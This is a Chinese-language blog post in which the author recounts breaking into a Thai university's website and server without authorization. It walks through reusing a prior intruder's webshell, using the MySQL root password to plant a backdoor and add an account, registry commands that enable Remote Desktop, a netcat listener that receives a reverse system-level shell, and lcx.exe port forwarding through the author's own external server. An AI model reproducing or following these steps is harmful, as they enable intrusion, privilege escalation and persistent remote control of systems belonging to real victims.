入侵泰国某大学网站并提权拿服务器

好长时间没写文章了，这段时间老是忙不过来，也没啥新的内容值得写出来了，前两天对网站的入侵我开始转战国外了，搞了一两天也有所收获，拿了些国外的网站和服务器。其实国外的有些网站比国内的好入侵得多，只不过是在渗透过程中找入口点比较难。昨天我就很轻松的拿下了一个泰国大学网站和服务器（貌似是大学，呵呵！）。
这些鸟文我是看不懂的了，不过拿这个站的shell是比较容易的，因为这站注入漏洞，貌似是之前有黑客入侵过，我在渗透过程中找到了那黑客的shell，然后踩着他的脚印就上去了

这个应该就是前来者的shell了，我用这个轻松的就上了我的大马。其实国外的一些服务器目录权限是很大的，我遇到过的很多国外服务器基本上每个盘都能浏览，而且大多数还能写入。而且像Wscript.Shell这些组件也基本上都存在。

有了这些获取提权信息是很不错的，不过国外的服务器也不是那么好提的，不像国内有什么360啊，serv-u什么的，国外我serv-u都没见一个。唯一提权的办法只有找root和sa密码。运气好能找到这两个的话那提权基本就没什么问题了。提这个泰国的服务器我还真费了不少周折呢。

上了shell后看了下服务器的信息，发现是个内网IP，然后注册表读取了下终端端口是3389，但在我传了cmd上去看的时候发现3389没有处于监听状态。用net start命令看下了Terminal Services是开启了的！

然后找到了网站的root密码，这下提权就很容易了，直接上了个mysqlbackdoor上去，使用root安装一个后门然后执行命令添加用户。

现在用户加上了，接下来就是要开启它的3389端口，并做转发上服务器了。由于Terminal Services服务是开启了的，只是3389端口为处于监听状态，这里可以执行两条注册表命令开启3389。

reg delete “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /f

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0

这两条命令执行也无需重启服务器，即可打开3389端口！但郁闷的是我在mysql后门上执行者两条命令后去查看端口情况始终未看到3389开启。试了很多次也不行，后来换了个MYSQL后门程序上去执行命令依然还是不行。

知道后来给闷豆请教的时候他让我反弹一个cmdshell出来试试，于是我便传了个反弹工具上服务器，结果发现工具放在C:\Documents and Settings\All Users\Documents\目录下后使用mysql后门程序执行不成功，后来放到D盘根目录下去后执行才成功了，可能是目录中有空格的原因。

我先在自己的一个外网服务器上nc -v -l -p 9999监听了下端口，然后在服务器上执行反弹工具，连接到我服务器上来
 

cmdshell就直接反弹回来了，因为在服务器上执行反弹的用户是root，是system权限的，所以反弹回来的cmdshell权限也是system的。有了这两的system权限其他的都应该好办了，还是先用这个cmdshell看看能不能开启3389端口。执行reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0命令后显示成功了。
 

现3389这次乖乖的就开上了，接下来就是端口转发了，上了个lcx.exe到服务器上，先在我外网服务器执行lcx -listen 3380 3381，监听我本地的3380端口和3381端口，然后到服务器上执行

D:\lcx.exe -slave 203.171.232.197 3380 192.168.16.4 3389  203那个是我服务器IP，192.168那个是目标服务器内网IP，执行后终端连接203.171.232.197:3381
 

这样就上了目标服务器的终端了